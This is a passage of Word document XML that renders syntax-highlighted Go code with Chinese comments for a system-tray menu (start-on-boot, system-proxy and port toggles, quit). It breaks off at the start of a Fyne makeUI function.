          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> toggle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>为一个匿名函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>此处设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>勾选框为勾选或者取消勾选、菜单隐藏或显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>【执行部分】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>如果删除此处的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，所有动作将执行第一个动作，其他动作之后则不执行，即便点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>也无济于事</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t>for {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>select {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ClickedCh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>意思是，点击的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>出来的事件，来触发对应动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t>case &lt;-mStartOnWithSystem.ClickedCh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>开机启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t>if mStartOnWithSystem.Checked() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>mStartOnWithSystem.Uncheck()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>} else {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>mStartOnWithSystem.Check()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>case &lt;-mSystemProxy.ClickedCh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>系统代理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t>if mSystemProxy.Checked() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>mSystemProxy.Uncheck()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>} else {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>mSystemProxy.Check()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>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t>case &lt;-mPort.ClickedCh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>端口设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t>fmt.Println("")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>case &lt;-mQuit.ClickedCh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>systray.Quit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>}()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>makeUI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() (*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
